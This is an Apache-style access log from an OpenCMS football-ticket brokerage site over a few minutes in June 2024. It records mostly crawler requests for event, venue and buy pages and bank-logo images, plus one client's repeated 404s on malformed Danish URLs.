47.128.39.74 - - [19/Jun/2024:23:38:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.39.74 - - [19/Jun/2024:23:38:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.39.74 - - [19/Jun/2024:23:38:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.39.74 - - [19/Jun/2024:23:38:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.39.74 - - [19/Jun/2024:23:38:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.39.74 - - [19/Jun/2024:23:38:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
54.36.149.71 - - [19/Jun/2024:23:38:15 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/la-liga/valencia/ HTTP/1.1" 200 72770
52.167.144.22 - - [19/Jun/2024:23:38:16 +0200] "GET /ticket2/opencms/sv/buy?page=1&edid=BE8C7FA0-9E48-EAB3-3A70-9E9F9EA30F95 HTTP/1.1" 200 121077
54.36.148.6 - - [19/Jun/2024:23:38:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/Valencia_CF.jpg HTTP/1.1" 200 22698
135.181.213.220 - - [19/Jun/2024:23:38:26 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:38:30 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=89E849E1-39BC-76C3-02C9-24D4404BD271 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:38:31 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
40.77.167.46 - - [19/Jun/2024:23:38:31 +0200] "GET /ticket2/opencms/ru/buy/?page=1&edid=7C7A5965-095C-D792-742A-EFFAFE2AB0A4 HTTP/1.1" 200 8183
40.77.167.108 - - [19/Jun/2024:23:38:34 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
40.77.167.108 - - [19/Jun/2024:23:38:34 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
135.181.213.220 - - [19/Jun/2024:23:38:36 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8A1734CD-57B7-0726-0561-5D6E94CAD0FB&sortorder=desc&column=row HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:38:41 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8A1734CD-57B7-0726-0561-5D6E94CAD0FB&sortorder=desc&column=section HTTP/1.1" 404 -
40.77.167.35 - - [19/Jun/2024:23:38:45 +0200] "GET /ticket2/opencms/en/venue/?venueid=986C5FEB-2D10-01B8-2D92-96427E4A1223 HTTP/1.1" 200 71442
54.36.149.62 - - [19/Jun/2024:23:38:45 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=757E2DFB-33DA-9B34-8402-9F06B19D8409 HTTP/1.1" 200 77861
135.181.213.220 - - [19/Jun/2024:23:38:46 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8A4A718B-F47F-7F60-721A-7893320E945C&sortorder=desc&column=section HTTP/1.1" 404 -
66.249.77.135 - - [19/Jun/2024:23:38:47 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=AE8A6CAA-9529-DB54-69E5-B3169B36CD6E HTTP/1.1" 200 98401
66.249.77.135 - - [19/Jun/2024:23:38:48 +0200] "GET /ticket2/opencms/dk/buy?page=1&edid=2197E523-8740-2A01-BD5D-12E3C3F2DBFE HTTP/1.1" 200 120877
66.249.77.64 - - [19/Jun/2024:23:38:49 +0200] "GET /ticket2/opencms/es/buy/?page=1&edid=72E12FE2-4DDC-1E5C-698A-850131DAAB42 HTTP/1.1" 200 112530
114.119.140.175 - - [19/Jun/2024:23:38:49 +0200] "GET /ticket2/opencms/en/buy/?page=10&eventid=6649D754-FC9A-DD56-57CA-2EE91B2B3185&venueid=00240B1E-8538-03A9-D9EC-46848A34DA12 HTTP/1.1" 200 72677
66.249.77.64 - - [19/Jun/2024:23:38:49 +0200] "GET /ticket2/opencms/es/buy/?page=1&edid=F2BB5427-1D4A-AECD-9787-90D94712CD18 HTTP/1.1" 200 112601
85.208.96.198 - - [19/Jun/2024:23:38:50 +0200] "GET /ticket2/opencms/it/sport/biglietti-calcio/ HTTP/1.1" 200 78052
66.249.77.78 - - [19/Jun/2024:23:38:51 +0200] "GET /ticket2/opencms/es/buy/?comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=8C381435-A1E8-94AF-2C58-D133FCA44A31 HTTP/1.1" 200 75516
135.181.213.220 - - [19/Jun/2024:23:38:51 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8AFE55BD-7AA2-1574-35EE-EA6F1BC5B990&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:38:56 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8B0DA89C-6395-E4EC-E13B-18842FA8AD15&sortorder=asc&column=price HTTP/1.1" 404 -
216.244.66.238 - - [19/Jun/2024:23:38:58 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
135.181.213.220 - - [19/Jun/2024:23:39:01 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8B5860C7-0D28-F997-5316-6C3ADCBCB96B&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:06 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8B5860C7-0D28-F997-5316-6C3ADCBCB96B&sortorder=desc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:23:39:08 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
54.36.148.65 - - [19/Jun/2024:23:39:10 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/la-liga/atletico_madrid/ HTTP/1.1" 200 71994
135.181.213.220 - - [19/Jun/2024:23:39:11 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8B5860C7-0D28-F997-5316-6C3ADCBCB96B&sortorder=desc&column=section HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:23:39:13 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
135.181.213.220 - - [19/Jun/2024:23:39:16 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8B8CABF1-EC4B-1D85-FDEB-4D562D28DF6F&sortorder=asc&column=section HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:21 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8C62C46C-EC63-8D01-6D09-30659877033D&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:26 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8CB9900F-6E27-0F63-4F92-A00CD27ED235 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8D10ED70-17CE-64D1-6B0A-A49372BFC93B&sortorder=asc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:23:39:33 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [19/Jun/2024:23:39:33 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
54.36.149.28 - - [19/Jun/2024:23:39:34 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=3A56B1C2-6FFB-C8D1-B229-B3914D5FF8DF HTTP/1.1" 200 76399
135.181.213.220 - - [19/Jun/2024:23:39:36 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8E9E8C37-EF46-7ED5-7B7A-E42AF5200133 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:40 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=902C95E3-A054-D4A8-928C-F96C2075E9A4 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:45 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=90B0A76B-3A0B-4556-74BE-A554C18176FF&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:50 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=92974E49-703A-F7F7-CF2E-C296D13B1DDD&sortorder=asc&column=row HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:39:55 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=97A6F983-CE12-526E-2DF4-50C758C31A49&sortorder=asc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:40:00 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=97AEB2E5-09C6-F111-BC6A-287F99B5A3AF&sortorder=desc&column=price HTTP/1.1" 404 -
54.36.148.223 - - [19/Jun/2024:23:40:03 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=A05A53F7-423D-23BE-575E-EA7B67DE22D9 HTTP/1.1" 200 76396
135.181.213.220 - - [19/Jun/2024:23:40:05 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9855A2C3-650C-23D8-F314-126B4A227928&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:40:10 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=995E8319-8CA0-AEF0-978E-B5B02C331A0E&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:40:15 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=995E8319-8CA0-AEF0-978E-B5B02C331A0E&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:40:19 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=997D1A24-03AF-7EA1-343A-6B028BBCA519&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:40:24 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=997D1A24-03AF-7EA1-343A-6B028BBCA519&sortorder=desc&column=section HTTP/1.1" 404 -
54.36.148.8 - - [19/Jun/2024:23:40:24 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=465306FD-802C-5175-10FF-40E426DD2769 HTTP/1.1" 200 76391
185.191.171.16 - - [19/Jun/2024:23:40:26 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/everton/fulham.html HTTP/1.1" 200 84503
114.119.132.248 - - [19/Jun/2024:23:40:28 +0200] "GET /ticket2/opencms/en/venue/?venueid=4127EEBD-FCE3-EDFF-3B26-3C946EF7942B HTTP/1.1" 200 71359
135.181.213.220 - - [19/Jun/2024:23:40:29 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=999480E6-504C-8744-5AC7-B6358D1C23F5 HTTP/1.1" 404 -
47.128.114.153 - - [19/Jun/2024:23:40:30 +0200] "GET /ticket2/opencms/fi/venue/?venueid=FE0A6C11-4A73-F647-BBF2-5FB155F67517 HTTP/1.1" 200 72950
47.128.114.153 - - [19/Jun/2024:23:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.114.153 - - [19/Jun/2024:23:40:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.114.153 - - [19/Jun/2024:23:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.114.153 - - [19/Jun/2024:23:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.114.153 - - [19/Jun/2024:23:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.114.153 - - [19/Jun/2024:23:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.114.153 - - [19/Jun/2024:23:40:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [19/Jun/2024:23:40:34 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9A29205F-E2C5-FE80-FBCE-7CBFC129FF1A HTTP/1.1" 404 -
114.119.135.232 - - [19/Jun/2024:23:40:34 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=4843A1B1-5DFE-6325-FBD6-98BB977A514A HTTP/1.1" 200 87394
135.181.213.220 - - [19/Jun/2024:23:40:38 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9A81C29E-DD67-3388-8B80-3F8BEA91B5A9&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:40:43 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9A983906-2E16-F256-CF2B-CC60D8D9570E&sortorder=desc&column=price HTTP/1.1" 404 -
40.77.167.70 - - [19/Jun/2024:23:40:45 +0200] "GET /ticket2/opencms/sv/search.html?searchQuery=2023 HTTP/1.1" 200 95525
195.90.221.76 - - [19/Jun/2024:23:40:47 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 105653
135.181.213.220 - - [19/Jun/2024:23:40:48 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9ACC1BFB-4C3B-B7F6-172D-4FE05B49FD36 HTTP/1.1" 404 -
66.249.77.65 - - [19/Jun/2024:23:40:52 +0200] "GET /ticket2/opencms/es/buy/?comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=30D5812D-0858-4843-8F45-C38AE504153C HTTP/1.1" 200 75512
135.181.213.220 - - [19/Jun/2024:23:40:53 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9AF124C6-5B34-2B8A-552A-D414DC7130F3&sortorder=desc&column=price HTTP/1.1" 404 -
54.36.149.92 - - [19/Jun/2024:23:40:55 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=CB847559-7ECA-CC50-D7D2-064AF0C06FB1 HTTP/1.1" 200 76395
135.181.213.220 - - [19/Jun/2024:23:40:58 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=9AF124C6-5B34-2B8A-552A-D414DC7130F3&sortorder=desc&column=row HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:41:03 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=A21206B8-B522-EC64-40BF-4BAFC22AFBC5 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:41:08 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=883106CC-5563-BF81-1FC9-D3F6F4B0585E HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:41:13 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=986B34CC-4C2E-FC20-9D57-8B3D634750A8 HTTP/1.1" 404 -
54.36.148.75 - - [19/Jun/2024:23:41:15 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=5ED34547-492C-90DA-709D-448345844685 HTTP/1.1" 200 76396
135.181.213.220 - - [19/Jun/2024:23:41:18 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=9DA806B5-AE6F-E9AB-EB84-310D57096066 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:41:23 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=AAAF9CBD-E20B-F830-6785-DFB285994112 HTTP/1.1" 404 -
199.45.155.82 - - [19/Jun/2024:23:41:25 +0200] "GET /ticket2/opencms/fr/ HTTP/1.1" 200 106103
135.181.213.220 - - [19/Jun/2024:23:41:28 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A9E385E-33D9-328E-DC79-CA2C7009C829&eventid=F2EBEE74-F753-D44A-FB65-0A2D3E3F4D37 HTTP/1.1" 404 -
199.45.155.82 - - [19/Jun/2024:23:41:29 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
135.181.213.220 - - [19/Jun/2024:23:41:33 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=36394212-F82E-F845-399B-42BED55969CC&eventid=20A69C7E-0BA1-61BE-E553-982148B48A51 HTTP/1.1" 404 -
31.220.87.217 - - [19/Jun/2024:23:41:37 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
54.36.149.7 - - [19/Jun/2024:23:41:37 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=412DBCF4-025D-8ABC-7A40-D7C760E055FF HTTP/1.1" 200 76398
52.167.144.233 - - [19/Jun/2024:23:41:37 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=8732E72C-A028-EA8C-4D4D-DEB44E2A28A8 HTTP/1.1" 200 76489
135.181.213.220 - - [19/Jun/2024:23:41:38 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=36394212-F82E-F845-399B-42BED55969CC&eventid=44A1774B-7690-4041-831D-F16B9B8104AB HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:41:43 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=4B941E1B-E4E2-C53E-C693-9FA91BBA9AD5&eventid=C8602219-A35D-BBF1-44FC-8B9C4AFC258E HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:41:48 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=3ED87672-1714-735A-8BA1-78AF866AA454 HTTP/1.1" 404 -
37.123.143.245 - - [19/Jun/2024:23:41:52 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jun/2024:23:41:52 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
135.181.213.220 - - [19/Jun/2024:23:41:53 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=4798C875-B602-9765-2D42-90861D6A4B84 HTTP/1.1" 404 -
52.167.144.18 - - [19/Jun/2024:23:41:55 +0200] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=4B941E1B-E4E2-C53E-C693-9FA91BBA9AD5 HTTP/1.1" 200 81687
135.181.213.220 - - [19/Jun/2024:23:41:58 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=840D0FAA-C6C7-4855-0B09-CFDB342638E1 HTTP/1.1" 404 -
54.36.148.1 - - [19/Jun/2024:23:42:02 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=8E4972FC-6E2C-77A4-BB9D-D67BD270A641 HTTP/1.1" 200 76387
40.77.167.46 - - [19/Jun/2024:23:42:02 +0200] "GET /ticket2/opencms/dk/buy?page=1&edid=F75A8704-39CC-1233-9E9B-2121B4DFC51E HTTP/1.1" 200 113933
135.181.213.220 - - [19/Jun/2024:23:42:03 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=AC35F274-5651-DA02-A922-BF876D6A93A3 HTTP/1.1" 404 -
40.77.167.46 - - [19/Jun/2024:23:42:04 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/empoli/ HTTP/1.1" 200 72521
135.181.213.220 - - [19/Jun/2024:23:42:08 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=B74886A7-7241-A15A-2EFF-607AA1CF20F4 HTTP/1.1" 404 -
114.119.140.175 - - [19/Jun/2024:23:42:08 +0200] "GET /ticket2/opencms/en/venue/?venueid=9105DCA9-DA89-4D98-8EC3-D0773C34A12F HTTP/1.1" 200 71332
135.181.213.220 - - [19/Jun/2024:23:42:13 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A&eventid=F0E5CAC7-0BEB-9BC8-E020-74FDDFC55572 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:42:18 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=70B37487-FE30-D476-CAE7-E6AFEA3153F2&eventid=095A8BF7-7FFB-9376-A9F2-AF8D28FDA17F HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:42:23 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=60DD1888-A212-4A9C-E256-57FE4F2AC5DC HTTP/1.1" 404 -
54.36.148.203 - - [19/Jun/2024:23:42:25 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=1DB7F66B-473B-B427-F752-358FEEFE8EC0 HTTP/1.1" 200 76398
135.181.213.220 - - [19/Jun/2024:23:42:26 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=FC8E19AE-C0B2-6E8A-15B8-33A65B1EFF7E HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:42:31 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=86B8BFA1-1588-AA1D-3D04-A686F7A89931 HTTP/1.1" 404 -
52.167.144.184 - - [19/Jun/2024:23:42:34 +0200] "GET /ticket2/opencms/sv/tickets/sevilla/osasuna.html HTTP/1.1" 200 72622
135.181.213.220 - - [19/Jun/2024:23:42:36 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=86DE6743-86A9-DC16-207D-050557FF8E35 HTTP/1.1" 404 -
40.77.167.19 - - [19/Jun/2024:23:42:41 +0200] "GET /ticket2/opencms/fi/login HTTP/1.1" 200 75191
135.181.213.220 - - [19/Jun/2024:23:42:41 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=87039048-105E-8CE5-42C5-F68B1CAF20F1 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:42:46 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=8804279E-720B-3823-9A08-59E6BC8C6993 HTTP/1.1" 404 -
185.191.171.10 - - [19/Jun/2024:23:42:47 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/bundesliga/stuttgart/ HTTP/1.1" 200 72426
47.128.61.199 - - [19/Jun/2024:23:42:48 +0200] "GET /ticket2/opencms/fi/venue/?venueid=38FFD183-CF6A-3217-EBBF-18C6D52232E9 HTTP/1.1" 200 72935
47.128.61.199 - - [19/Jun/2024:23:42:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.61.199 - - [19/Jun/2024:23:42:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
54.36.148.83 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/dk/venue/?venueid=8016D2EB-5A30-A503-2E51-C1845CAF0467 HTTP/1.1" 200 71872
47.128.61.199 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.61.199 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.61.199 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.61.199 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.61.199 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [19/Jun/2024:23:42:50 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=88CD3DCB-6C66-21AB-14E7-03E03E9AFC17 HTTP/1.1" 404 -
40.77.167.254 - - [19/Jun/2024:23:42:52 +0200] "GET /ticket2/opencms/sitemap.xml HTTP/1.1" 200 76218
185.191.171.3 - - [19/Jun/2024:23:42:54 +0200] "GET /ticket2/opencms/fr/about/contact HTTP/1.1" 200 71884
135.181.213.220 - - [19/Jun/2024:23:42:55 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=88F20D3F-EBA2-7C19-10F1-4E6F4D450802 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:43:00 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=8EB4BE4E-46E1-0259-F904-A6F8B9C1FF44 HTTP/1.1" 404 -
40.77.167.46 - - [19/Jun/2024:23:43:02 +0200] "GET /ticket2/opencms/fr HTTP/1.1" 200 106103
185.191.171.19 - - [19/Jun/2024:23:43:02 +0200] "GET /ticket2/opencms/de/magazine/article?title=brentford-fc HTTP/1.1" 200 74363
135.181.213.220 - - [19/Jun/2024:23:43:05 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=8F1C58A5-AB54-4543-387E-79AFEDE502A3 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:43:10 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9084A0AD-A457-4779-1853-976B165CA65B HTTP/1.1" 404 -
54.36.149.14 - - [19/Jun/2024:23:43:10 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9 HTTP/1.1" 200 82794
135.181.213.220 - - [19/Jun/2024:23:43:14 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=91D3BB7B-B59C-251F-6710-C982EB798A34 HTTP/1.1" 404 -
135.181.213.220 - - [19/Jun/2024:23:43:19 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=92E24BFF-7668-4406-36DC-A28485BFFEBD HTTP/1.1" 404 -
52.167.144.23 - - [19/Jun/2024:23:43:21 +0200] "GET /ticket2/opencms/en/venue/?venueid=D2E7742E-B3AB-CC80-7552-271DAD847F3D HTTP/1.1" 200 71395
135.181.213.220 - - [19/Jun/2024:23:43:24 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=937B8702-90CF-4FC2-B8F7-AB9AC6BF82E1 HTTP/1.1" 404 -
